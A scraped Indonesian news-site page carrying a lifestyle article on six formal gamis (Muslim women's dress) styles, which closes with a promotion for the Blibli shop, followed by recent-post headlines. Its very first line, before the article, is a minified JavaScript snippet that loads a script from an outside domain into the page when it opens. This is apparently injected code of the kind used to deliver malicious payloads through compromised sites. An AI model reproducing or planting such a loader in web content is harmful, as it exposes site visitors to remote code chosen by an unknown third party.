(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

6 Model Baju Gamis Simple dan Mewah Cocok untuk Acara Formal


KANALKALIMANTAN.COM – Perkembangan fashion muslimah kini sudah sangat pesat dengan banyak pilihan yang semakin beragam. Tidak hanya untuk menghadiri acara keagamaan saja, model baju gamis simple dan mewah bisa Anda jadikan pilihan untuk tampilan menawan saat menghadiri pesta atau acara formal. Model tersebut tidak akan menciptakan tampilan yang berlebihan atau berkesan glamor, namun Anda bisa terlihat lebih anggun dan menarik.

6 Model Baju Gamis Simple dan Mewah 

Model baju gamis tidak hanya diperuntukkan atau diminati oleh para orangtua saja. Di pasaran telah tersedia banyak baju gamis simple dan mewah dengan model dan gaya yang sesuai digunakan untuk usia remaja hingga wanita dewasa muda. Anda bisa memilih baju gamis dengan bahan motif atau polos dalam berbagai warna cerah sesuai selera. Khususnya untuk menghadiri acara formal dan pesta, berikut ini rekomendasi yang bisa Anda jadikan pertimbangan:

1.Gamis Aksen Slit

Anda bisa tampil simple sekaligus mewah saat pesta atau menghadiri acara formal dengan gamis yang menggunakan aksen slit. Aksen ini ditempatkan memanjang dari dada hingga ujung bawah gamis yang membuat tampilan Anda jadi semakin ramping. Aksen slit dengan cutting lurus dan tidak terlalu lebar, akan menjaga langkah kaki tetap dalam jarak yang nyaman.

Potongan H-line menciptakan ilusi tubuh lebih tinggi dan ramping. Anda bisa memilih gamis polos atau motif dengan aksen ini dan memadukannya dengan jilbab senada. Lengkapi penampilan dengan aksesoris berupa bros yang menambah gaya Anda terlihat mewah dan feminin.

2. Gamis Aksen Sambungan

Simple tapi mewah bisa Anda tampilkan dengan pilihan model gamis menggunakan cutting A-line dengan akses sambungan di bagian lutut. Aksen sambungan ini akan membuat Anda lebih berisi. Dengan tambahan aksen tali pita pada kerah dan ujung lengan, model gamis ini bisa diandalkan untuk menghadiri pesta atau acara formal. Namun, Anda juga bisa memakainya untuk acara yang lebih santai seperti hangout di mall bersama teman-teman.

3. Gamis A-Line Two Tone

Tampil mewah tidak harus glamor dan ribet. Anda bisa memakai gamis A-line two tone alias perpaduan dua warna menawan. Model ini sedang tren di pasaran, dengan pilihan warna pastel senada, warna kontras, atau paduan dengan putih.

Penempatan kombinasi warna biasanya diletakkan pada bagian ujung lengan atau bawah rok gamis. Potongan A-line akan membuat kaki Anda melangkah lebih leluasa. Anda bisa memadukannya dengan mengenakan high heels agar tampilan jadi lebih ramping dan menarik saat di pesta. Pilih warna hijab yang sama dengan warna salah satu kombinasi agar tidak terkesan ramai.

4. Gamis Lengan dan Rok Rempel

Model rempel membuat tampilan Anda terlihat mewah yang cocok untuk pesta. Model ini merupakan model abadi yang bisa dipakai sepanjang masa. Anda bisa memilih bahan silk polos untuk menampilkan kesan lebih mewah meski tanpa detail yang ramai. Rempel pada bagian lengan dan bawah rok gamis sudah cukup menekankan tampilan Anda yang memukau dan menarik perhatian.

5. Gamis Cape

Gamis cape selalu berhasil membuat tampilan Anda lebih memukau bak putri raja. Aksen cape pada bagian bahu yang melebar ke bawah dada dan siku ini membuat Anda terlihat semakin syar’i dan anggun. Model baju gamis simple dan mewah sangat cocok untuk menghadiri acara-acara formal yang bisa Anda padukan dengan gaya hijab terlilit rapat di bagian leher untuk menampilkan cape yang sempurna.

6. Gamis Kombinasi Tile

Bahan tile sangat identik digunakan untuk acara pesta dan formal. Anda bisa memilih gamis model kombinasi tile dengan silk atau ceruti. Jika Anda ingin tampil lebih mewah dan glamor, Anda bisa menambahkan payet atau kristal agar gamis jadi lebih gemerlap. Namun, jika Anda ingin terlihat lebih simple, maka tidak perlu menggunakan payet dan menggantinya dengan aksesoris berupa bros yang tersemat pada hijab di bagian dada, leher, atau belakang kepala.

Nah, itulah tadi beberapa model gamis simple tapi mewah yang bisa Anda dapatkan di pasar online seperti Blibli dengan mudah. Blibli menyediakan berbagai model, ukuran, dan warna gamis yang bisa Anda pilih sesuai selera. Tersedia juga produk fashion muslimah dari brand-brand terkemuka untuk melengkapi koleksi gamis acara formal Anda.

Belanja gamis di Blibli menawarkan banyak keuntungan yang bisa Anda manfaatkan. Salah satunya adalah promo harga hemat menggunakan kupon cashback, diskon, dan gratis ongkir. Anda hanya perlu mengakses Blibli melalui aplikasi atau website untuk menggunakan promo-promo tersebut. Yuk, belanja gamis simple dan mewah di Blibli sekarang juga! (Kanalkalimantan.com/kk)

Editor : kk


Muhammad Andi

Recent Posts

Peresmian Masjid Raya Syekh Muhammad Arsyad Al-Banjari Ditarget pada Agustus 2024

KANALKALIMANTAN.COM, BANJARBARU - Melalui Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Pemerintah Provinsi Kalimantan Selatan… Read More

1 jam ago

Minus PPP, Upaya Lisa Halaby Cari Parpol Pengusung Berakhir di PDI P

KANALKALIMANTAN.COM, BANJARBARU - Figur non partai politik (Parpol) Lisa Halaby menutup lawatan politik ke Partai… Read More

2 jam ago

Evaluasi Aplikasi Smart Kampung Manis, DKISP Banjar Gelar Rakor

KANALKALIMANTAN.COM, MARTAPURA - Rapat koordinasi (rakor) Aplikasi Smart Kampung Manis, digelar Dinas Komunikasi Informatika Statistik… Read More

2 jam ago

Lepas Keberangkatan Jemaah Haji Asal Kabupaten Banjar, Ini Pesan Plt Kabag Kesra

KANALKALIMANTAN.COM, MARTAPURA - Jemaah calon haji asal Kabupaten Banjar yang berjumlah 97 orang dan ditambah… Read More

3 jam ago

Dansatgas TMMD Tinjau Kebun Tanaman Holtikultura Desa Karias Dalam

KANALKALIMANTAN.COM, AMUNTAI – Di tengah pelaksanaan program TNI Manunggal Membangun Desa (TMMD) ke-120, Komandan Kodim… Read More

3 jam ago

Air Zamzam Jemaah Haji Embarkasi Banjarmasin Tiba di Asrama Haji

KANALKALIMANTAN.COM, BANJARBARU - Ribuan galon air zamzam yang diperuntukan bagi jemaah haji Embarkasi Banjarmasin tahun… Read More

4 jam ago

This website uses cookies.